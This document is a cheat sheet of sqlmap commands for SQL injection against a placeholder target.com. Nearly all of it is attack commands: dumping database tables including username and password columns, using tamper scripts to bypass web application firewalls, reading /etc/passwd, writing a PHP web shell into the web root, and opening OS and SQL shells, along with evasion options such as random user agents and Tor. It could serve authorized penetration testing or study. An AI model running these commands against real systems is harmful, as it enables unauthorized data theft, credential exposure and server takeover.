# Test a URL
sqlmap -u "http://target.com/page.php?id=1"
# Test with POST data
sqlmap -u "http://target.com/login" --data="user=admin&pass=test"
# Test specific parameter
sqlmap -u "http://target.com/page.php?id=1&cat=2" -p id
# From a saved request file (Burp Suite)
sqlmap -r request.txt
# With cookies
sqlmap -u "http://target.com/page.php?id=1" --cookie="session=abc123"
# With HTTP auth
sqlmap -u "http://target.com/" --auth-type=basic --auth-cred="admin:password"
# With custom headers
sqlmap -u "http://target.com/" -H "Authorization: Bearer token123"
sqlmap -u "http://target.com/" -H "X-Forwarded-For: 127.0.0.1"
# Get current database
sqlmap -u "http://target.com/?id=1" --current-db
# Get current user
sqlmap -u "http://target.com/?id=1" --current-user
# List all databases
sqlmap -u "http://target.com/?id=1" --dbs
# List tables in database
sqlmap -u "http://target.com/?id=1" -D dbname --tables
# Dump table columns
sqlmap -u "http://target.com/?id=1" -D dbname -T users --columns
# Dump table data
sqlmap -u "http://target.com/?id=1" -D dbname -T users --dump
# Dump specific columns
sqlmap -u "http://target.com/?id=1" -D dbname -T users -C username,password --dump
# Specify technique (B=Boolean, E=Error, U=Union, S=Stacked, T=Time, Q=Inline)
sqlmap -u "http://target.com/?id=1" --technique=BEUST
# Time-based only (blind)
sqlmap -u "http://target.com/?id=1" --technique=T --time-sec=5
# Union-based only
sqlmap -u "http://target.com/?id=1" --technique=U --union-cols=3
# Use random user-agent
sqlmap -u "http://target.com/?id=1" --random-agent
# Delay between requests
sqlmap -u "http://target.com/?id=1" --delay=2
# Use a proxy (Burp Suite)
sqlmap -u "http://target.com/?id=1" --proxy=http://127.0.0.1:8080
# Tamper scripts (WAF bypass)
sqlmap -u "http://target.com/?id=1" --tamper=space2comment
sqlmap -u "http://target.com/?id=1" --tamper=between,randomcase
sqlmap -u "http://target.com/?id=1" --tamper=base64encode
# List tamper scripts
sqlmap --list-tampers
# Read a file
sqlmap -u "http://target.com/?id=1" --file-read=/etc/passwd
# Write a file (needs write permission)
sqlmap -u "http://target.com/?id=1" --file-write=/tmp/shell.php --file-dest=/var/www/html/shell.php
# OS shell (if stacked queries + file write)
sqlmap -u "http://target.com/?id=1" --os-shell
# SQL shell
sqlmap -u "http://target.com/?id=1" --sql-shell
| Flag | Description |
|---|
--level=5 | Test level (1-5, default 1) |
--risk=3 | Risk level (1-3, default 1) |
--batch | Non-interactive, use defaults |
--threads=5 | Concurrent threads |
--dbms=mysql | Force specific DBMS |
--forms | Auto-detect and test forms |
--crawl=2 | Crawl site depth |
-v 3 | Verbosity level (0-6) |
--tor | Use Tor network |
--flush-session | Clear cached results |